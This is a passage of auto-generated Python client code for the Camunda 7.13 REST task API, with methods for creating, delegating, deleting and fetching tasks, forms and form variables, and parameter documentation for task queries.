be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_dto' in local_var_params:
body_params = local_var_params['task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/create', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delegate_task(self, id, **kwargs): # noqa: E501
"""delegate_task # noqa: E501
Delegates a task to another user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delegate_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to delegate. (required)
:param UserIdDto user_id_dto: Provide the id of the user that the task should be delegated to.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delegate_task_with_http_info(id, **kwargs) # noqa: E501
def delegate_task_with_http_info(self, id, **kwargs): # noqa: E501
"""delegate_task # noqa: E501
Delegates a task to another user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delegate_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to delegate. (required)
:param UserIdDto user_id_dto: Provide the id of the user that the task should be delegated to.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'user_id_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delegate_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delegate_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_id_dto' in local_var_params:
body_params = local_var_params['user_id_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/delegate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_task(self, id, **kwargs): # noqa: E501
"""delete_task # noqa: E501
Removes a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be removed. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_task_with_http_info(id, **kwargs) # noqa: E501
def delete_task_with_http_info(self, id, **kwargs): # noqa: E501
"""delete_task # noqa: E501
Removes a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be removed. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_deployed_form(self, id, **kwargs): # noqa: E501
"""get_deployed_form # noqa: E501
Retrieves the deployed form that is referenced from a given task. For further information please refer to the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#embedded-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployed_form(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the deployed form for. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_deployed_form_with_http_info(id, **kwargs) # noqa: E501
def get_deployed_form_with_http_info(self, id, **kwargs): # noqa: E501
"""get_deployed_form # noqa: E501
Retrieves the deployed form that is referenced from a given task. For further information please refer to the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#embedded-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_deployed_form_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the deployed form for. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(file, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_deployed_form" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_deployed_form`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/xhtml+xml', 'application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/deployed-form', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_form(self, id, **kwargs): # noqa: E501
"""get_form # noqa: E501
Retrieves the form key for a task. The form key corresponds to the `FormData#formKey` property in the engine. This key can be used to do task-specific form rendering in client applications. Additionally, the context path of the containing process application is returned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the form for. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FormDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_form_with_http_info(id, **kwargs) # noqa: E501
def get_form_with_http_info(self, id, **kwargs): # noqa: E501
"""get_form # noqa: E501
Retrieves the form key for a task. The form key corresponds to the `FormData#formKey` property in the engine. This key can be used to do task-specific form rendering in client applications. Additionally, the context path of the containing process application is returned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the form for. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FormDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_form" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_form`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/form', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FormDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_form_variables(self, id, **kwargs): # noqa: E501
"""get_form_variables # noqa: E501
Retrieves the form variables for a task. The form variables take form data specified on the task into account. If form fields are defined, the variable types and default values of the form fields are taken into account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form_variables(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variables for. (required)
:param str variable_names: A comma-separated list of variable names. Allows restricting the list of requested variables to the variable names in the list. It is best practice to restrict the list of variables to the variables actually required by the form in order to minimize fetching of data. If the query parameter is ommitted all variables are fetched. If the query parameter contains non-existent variable names, the variable names are ignored.
:param bool deserialize_values: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on server side (default true). If set to true, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](http://jackson.codehaus.org/) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to false, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While true is the default value for reasons of backward compatibility, we recommend setting this parameter to false when developing web applications that are independent of the Java process applications deployed to the engine.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: dict(str, VariableValueDto)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_form_variables_with_http_info(id, **kwargs) # noqa: E501
def get_form_variables_with_http_info(self, id, **kwargs): # noqa: E501
"""get_form_variables # noqa: E501
Retrieves the form variables for a task. The form variables take form data specified on the task into account. If form fields are defined, the variable types and default values of the form fields are taken into account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_form_variables_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variables for. (required)
:param str variable_names: A comma-separated list of variable names. Allows restricting the list of requested variables to the variable names in the list. It is best practice to restrict the list of variables to the variables actually required by the form in order to minimize fetching of data. If the query parameter is ommitted all variables are fetched. If the query parameter contains non-existent variable names, the variable names are ignored.
:param bool deserialize_values: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on server side (default true). If set to true, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](http://jackson.codehaus.org/) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to false, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While true is the default value for reasons of backward compatibility, we recommend setting this parameter to false when developing web applications that are independent of the Java process applications deployed to the engine.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(dict(str, VariableValueDto), status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'variable_names',
'deserialize_values'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_form_variables" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_form_variables`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'variable_names' in local_var_params and local_var_params['variable_names'] is not None: # noqa: E501
query_params.append(('variableNames', local_var_params['variable_names'])) # noqa: E501
if 'deserialize_values' in local_var_params and local_var_params['deserialize_values'] is not None: # noqa: E501
query_params.append(('deserializeValues', local_var_params['deserialize_values'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/form-variables', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, VariableValueDto)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_rendered_form(self, id, **kwargs): # noqa: E501
"""get_rendered_form # noqa: E501
Retrieves the rendered form for a task. This method can be used to get the HTML rendering of a [Generated Task Form](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#generated-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_rendered_form(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the rendered form for. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_rendered_form_with_http_info(id, **kwargs) # noqa: E501
def get_rendered_form_with_http_info(self, id, **kwargs): # noqa: E501
"""get_rendered_form # noqa: E501
Retrieves the rendered form for a task. This method can be used to get the HTML rendering of a [Generated Task Form](https://docs.camunda.org/manual/7.13/user-guide/task-forms/#generated-task-forms). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_rendered_form_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to get the rendered form for. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(file, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_rendered_form" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_rendered_form`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/xhtml+xml', 'application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/rendered-form', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task(self, id, **kwargs): # noqa: E501
"""get_task # noqa: E501
Retrieves a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be retrieved. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TaskDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_task_with_http_info(id, **kwargs) # noqa: E501
def get_task_with_http_info(self, id, **kwargs): # noqa: E501
"""get_task # noqa: E501
Retrieves a task by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be retrieved. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(TaskDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TaskDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tasks(self, **kwargs): # noqa: E501
"""get_tasks # noqa: E501
Queries for tasks that fulfill a given filter. The size of the result set can be retrieved by using the Get Task Count method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the give business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the passed and comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the passed and comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the passed and comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of his groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. Default is to only include tasks that are not assigned to any user if you query by candidate user or group(s).
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a lower or equal priority.
:param int min_priority: Restrict to tasks that have a higher or equal priority.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
